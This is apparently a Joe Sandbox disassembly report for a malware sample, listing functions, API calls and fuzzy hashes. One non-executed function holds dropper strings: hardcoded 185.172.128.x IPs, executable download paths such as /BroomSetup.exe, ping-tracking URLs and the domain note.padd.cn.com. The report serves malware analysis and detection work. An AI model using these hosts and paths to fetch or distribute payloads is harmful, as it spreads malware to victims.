Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 024E0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,024E0223,?,?), ref: 024E0E19
SetErrorMode.KERNEL32(00000000,?,?,024E0223,?,?), ref: 024E0E1E

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 976d7545bf58b2575a6f5fc2ad6292d4e66bc1bcbf73e3e118de18fb1b373a76
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: B0D0123114512877DB003A94DC09BCE7B1CDF05B67F008021FB0DE9180C7B0954046E5

Uniqueness

Uniqueness Score: -1.00%

Function 00408198 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

std::regex_error::regex_error.LIBCPMT ref: 004081A4

Part of subcall function 00408040: std::exception::exception.LIBCONCRT ref: 00408058

__CxxThrowException@8.LIBVCRUNTIME ref: 004081B2

Part of subcall function 0040ABCB: KiUserExceptionDispatcher.NTDLL(?,?,?,0040996C,?,?,?,?,?,?,?,?,0040996C,?,00438A4C), ref: 0040AC2B

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: DispatcherExceptionException@8ThrowUserstd::exception::exceptionstd::regex_error::regex_error
String ID:
API String ID: 964721716-0
Opcode ID: d62da80a3684c30e6ad3ebe5b93b082f3a99603087db647614469e16434a24a4
Instruction ID: a76997e87f68b3a191f62a2152014b4e80abd2d03d6f885f9787d4c28a8fe2d8
Opcode Fuzzy Hash: d62da80a3684c30e6ad3ebe5b93b082f3a99603087db647614469e16434a24a4
Instruction Fuzzy Hash: 6CC0127045020C66CB00F6A5CC46DBE763CA908200F40082E762021082AA38A118465A

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
Opcode Fuzzy Hash: 89ee0429e7c3b78fee215e5908ca075a1a99ef19cdf9331575feb5a3c314da26
Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041AF0E

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 701e18208b567a6bb177b1ccb661cbfd4effab1e33f914200ccb643209a10c45
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A212

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
Opcode Fuzzy Hash: b75641747b422377c90d67b6dee4493775f18ffac96cc9d64fbbcf0dcb9ea88a
Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Function 008EFFBD Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008F000E

Memory Dump Source

Source File: 00000000.00000002.1965167409.00000000008EF000.00000040.00000020.00020000.00000000.sdmp, Offset: 008EF000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8ef000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: c9b7cf3f8bf595db61c43f78623c9a1e7e60aae191502acde6c622cf11868999
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 0D113F79A00208EFDB01DF98C985E98BBF5EF08351F158094FA489B362D775EA50DF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02504C75 Relevance: 48.5, APIs: 2, Strings: 25, Instructions: 1237COMMON

Download Yara Rule

APIs

Part of subcall function 02506823: __EH_prolog.LIBCMT ref: 02506828

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 02504D3B

Part of subcall function 025062B1: __EH_prolog.LIBCMT ref: 025062B6
Part of subcall function 025062B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 02506398

Strings

/syncUpd.exe, xrefs: 02505923, 025059A5, 02505AD6
185.172.128.59, xrefs: 025057A3, 0250583D, 02505AB4
/cpa/ping.php?substr=%s&s=ab&sub=%s, xrefs: 0250501D, 025051B3, 025051CC
185.172.128.228, xrefs: 02505527, 025055CD, 0250574C
\run.exe, xrefs: 02505E37, 02505E8F
185.172.128.228, xrefs: 02505F88, 02506034, 02506139
185.172.128.90, xrefs: 0250521A, 025052B4, 02505302
P, xrefs: 02505ABC
P, xrefs: 02505312
/BroomSetup.exe, xrefs: 0250604E, 025060F4, 02506142
P, xrefs: 0250575C
.exe, xrefs: 0250618D, 025061AF
note.padd.cn.com, xrefs: 02505BA9, 02505C61, 02505D66
.zip, xrefs: 02505DC4, 02505DE6
@, xrefs: 02504CE3
/1/Package.zip, xrefs: 02505C7B, 02505D15, 02505D6F
iC, xrefs: 02505E24
SOFTWARE\BroomCleaner, xrefs: 02505358, 0250544C
/timeSync.exe, xrefs: 025059C6, 02505A59, 02505AC7
185.172.128.203, xrefs: 0250585E, 02505904, 02505AA6
/ping.php?substr=%s, xrefs: 025055EE, 025056C4, 025056DC
.exe, xrefs: 02505B18, 02505B3A
P, xrefs: 0250614A
P, xrefs: 02505D77
Installed, xrefs: 02505466, 025054C4

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
String ID: @$ iC$.exe$.exe$.zip$/1/Package.zip$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$/timeSync.exe$185.172.128.203$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$SOFTWARE\BroomCleaner$\run.exe$note.padd.cn.com
API String ID: 2531350358-3920416335
Opcode ID: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction ID: 2bda5335abc6d58eeca32c1049f516369f0c34727d642cfe6369d3693408424b
Opcode Fuzzy Hash: 250d8a035f8b337f53b0f2b82bef072aba3463d320e73a283fe624a254bad318
Instruction Fuzzy Hash: 68A2855040B2D06EDB22BF7D58566EE2FE29B53741F5464EFD2A61B322CB64400C8BDA

Uniqueness

Uniqueness Score: -1.00%

Function 0042086B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetUserDefaultLCID.KERNEL32 ref: 00420977
IsValidCodePage.KERNEL32(00000000), ref: 004209D2
IsValidLocale.KERNEL32(?,00000001), ref: 004209E1
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00420A29
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00420A48

Strings

,CUSA, xrefs: 004208D0

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: ,CUSA
API String ID: 745075371-2978500865
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 7ddd42caa13bcc6a581a5d9380eb1867f4bda1d866acf156490288d52a5f9f8d
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 2351A4B1B002299BEB20DFA5EC45BBF77F8AF04700F54056BE505E7252D7789980CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0042140C Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00421552

Strings

1#INF, xrefs: 0042275F
1#SNAN, xrefs: 00422751
1#IND, xrefs: 0042274A
1#QNAN, xrefs: 00422758

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction ID: ba3d8f5800837f2e7df06b198bc907b13d59b0e20819b9a43c463b3a9b279e29
Opcode Fuzzy Hash: a37a3ecc05295ae32eb63500af4b11397377d5339e0099b2d7883d6d4fea4a99
Instruction Fuzzy Hash: 04C25A71E082289FDB25CE28ED407EAB7B5EB94304F5541EBD84DE7250E778AE818F44

Uniqueness

Uniqueness Score: -1.00%

Function 0041FF33 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

IsValidCodePage.KERNEL32(00000000), ref: 00420015
_wcschr.LIBVCRUNTIME ref: 004200A5
_wcschr.LIBVCRUNTIME ref: 004200B3
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 00420156

Strings

,CUSA, xrefs: 0041FF71

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: ,CUSA
API String ID: 4212172061-2978500865
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: fa09c2a12b3627a5d585845c4e70effd6588540dd04b31b38b5545ebe516d264
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 2C610871700216AAE724AB35EC42BEB77E8EF04314F14403FF505D7282EA79E986C769

Uniqueness

Uniqueness Score: -1.00%

Function 025008FE Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 02500997
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 025009C0
GetACP.KERNEL32 ref: 025009D5

Strings

OCP, xrefs: 02500952
ACP, xrefs: 0250091C

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: 1c198f87975b285e44f14d8261aa98e32d423a888d93a1926d7273abef85e4c3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: B921C432F00104AAF7308F55CD80BA77BA6BBA4A64B468C65E94DD71C0E732DA41C398

Uniqueness

Uniqueness Score: -1.00%

Function 00420697 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 00420730
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 00420759
GetACP.KERNEL32 ref: 0042076E

Strings

OCP, xrefs: 004206EB
ACP, xrefs: 004206B5

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction ID: ccfaff94e51ab864e712d9520aeba98098d7830e350b78e24d8ea24043a496f3
Opcode Fuzzy Hash: 72d3ff9daaa20821932bd1486a70992e0b513832b1a5c534fdba9837e67b2258
Instruction Fuzzy Hash: 8821F422B00125ABD7308F14E900A9BB3E6ABD4B50BD68176E90AD7312E736ED41CB48

Uniqueness

Uniqueness Score: -1.00%

Function 02500AD2 Relevance: 7.7, APIs: 5, Instructions: 188COMMON

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FDF
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FEC

GetUserDefaultLCID.KERNEL32 ref: 02500BDE
IsValidCodePage.KERNEL32(00000000), ref: 02500C39
IsValidLocale.KERNEL32(?,00000001), ref: 02500C48
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 02500C90
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 02500CAF

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID:
API String ID: 745075371-0
Opcode ID: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction ID: 3b886a2c044559a0d7cf97d06e1e15fcca710597f1d86d35395aa92a266d1c24
Opcode Fuzzy Hash: 7a1be57ac465552201368d881ee0be8e618b3833191cff01430afd0861729407
Instruction Fuzzy Hash: 41518171A0021AABDF20EFA5CC85BBEB7B9FF44704F04456AE914E71D0EB709944CB69

Uniqueness

Uniqueness Score: -1.00%

Function 004123A0 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 464COMMON

Download Yara Rule

Strings

y%B, xrefs: 00412808, 004125F2, 00412481
y%B, xrefs: 004123BD, 00412568, 0041278C, 00412726, 004125B6, 00412544

Memory Dump Source

Source File: 00000000.00000002.1964577460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_R0hb7jyBcv.jbxd

Similarity

API ID:
String ID: y%B$y%B
API String ID: 0-2510245575
Opcode ID: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction ID: 7f81a5055d29d3c9b3a65b9dd9c97bea9b47a5c616e9cad61c519a63aba044dd
Opcode Fuzzy Hash: 639d753ca5804acfb26a7323c6b70442fdf5003eed0a35c333bc141f8f4a1fb1
Instruction Fuzzy Hash: F8024C71E002199FDF14CFA9D9806EEB7F1FF88314F25826AD819E7380D774AA518B94

Uniqueness

Uniqueness Score: -1.00%

Function 0250019A Relevance: 6.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 024F6F80: GetLastError.KERNEL32(?,?,024EE697,?,?,?,024EED94,?), ref: 024F6F84
Part of subcall function 024F6F80: _free.LIBCMT ref: 024F6FB7
Part of subcall function 024F6F80: SetLastError.KERNEL32(00000000), ref: 024F6FF8
Part of subcall function 024F6F80: _abort.LIBCMT ref: 024F6FFE

IsValidCodePage.KERNEL32(00000000), ref: 0250027C
_wcschr.LIBVCRUNTIME ref: 0250030C
_wcschr.LIBVCRUNTIME ref: 0250031A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 025003BD

Memory Dump Source

Source File: 00000000.00000002.1965682616.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24e0000_R0hb7jyBcv.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID:
API String ID: 4212172061-0
Opcode ID: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction ID: c2b7e887482a83cae0c8e6d38155cc808065e45b2886e2500c683cf9c5a86f5f
Opcode Fuzzy Hash: 5d883d2d082d071b8501f44053835b4cd522b32872b8a8b1797b09453fc8981d
Instruction Fuzzy Hash: 8761F872614206ABDB25AF75CC81BBB77ACFF48305F15442AEA05D71C0EB74E944CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0042031E Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00420372
